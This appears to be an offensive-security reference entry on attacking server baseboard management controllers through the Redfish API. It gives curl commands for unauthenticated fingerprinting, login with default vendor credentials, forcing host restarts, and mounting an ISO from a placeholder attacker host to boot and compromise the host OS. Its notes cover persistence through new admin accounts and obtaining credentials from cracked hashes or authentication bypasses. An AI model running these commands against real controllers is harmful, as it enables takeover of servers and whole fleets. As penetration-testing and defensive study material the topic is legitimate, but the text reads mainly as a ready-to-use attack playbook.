Redfish is the DMTF-standardised REST/JSON API that modern BMCs (iDRAC, iLO, Supermicro, OpenBMC) expose over HTTPS, intended to replace the legacy IPMI interface. For an attacker it is the clean, scriptable control plane: authenticated with default or recovered credentials (or reached via an authentication flaw), it reads full hardware inventory and performs the host-compromising operations, querying and changing power state, setting the one-time boot device, creating and modifying BMC accounts, and attaching virtual media. It delivers the same impact as the IPMI attacks through a well-documented API, which makes it convenient for enumeration and automation across many controllers.
# unauthenticated service root reveals structure/version
curl -sk https://<bmc>/redfish/v1/
# authenticate (default/recovered creds) and enumerate
curl -sk -u root:calvin https://<bmc>/redfish/v1/Systems/
# control the host: power and one-time boot
curl -sk -u root:calvin -X POST https://<bmc>/redfish/v1/Systems/System.Embedded.1/Actions/ComputerSystem.Reset \
-H 'Content-Type: application/json' -d '{"ResetType":"ForceRestart"}'
# attach virtual media (mount an attacker ISO) and boot from it
curl -sk -u root:calvin -X POST https://<bmc>/redfish/v1/Managers/.../VirtualMedia/CD/Actions/VirtualMedia.InsertMedia \
-d '{"Image":"http://attacker/evil.iso"}'
# create a persistent admin BMC account via the Accounts collection
Exploitation notes#
- Redfish is the scriptable equivalent of the IPMI/vendor attacks: with credentials it reads inventory and drives power, boot, accounts, and virtual media across controllers uniformly, ideal for fleet-wide automation.
- The highest-impact action is the same as elsewhere, attach attacker virtual media and set a one-time boot to compromise the host OS; power/boot control and account creation support that and persistence.
- Credentials come from defaults, cracked RAKP hashes, or a controller exploit; some Redfish implementations have also had their own authentication-bypass flaws, so test the service root and version.
- The unauthenticated
/redfish/v1/root leaks structure and firmware version for fingerprinting even before credentials.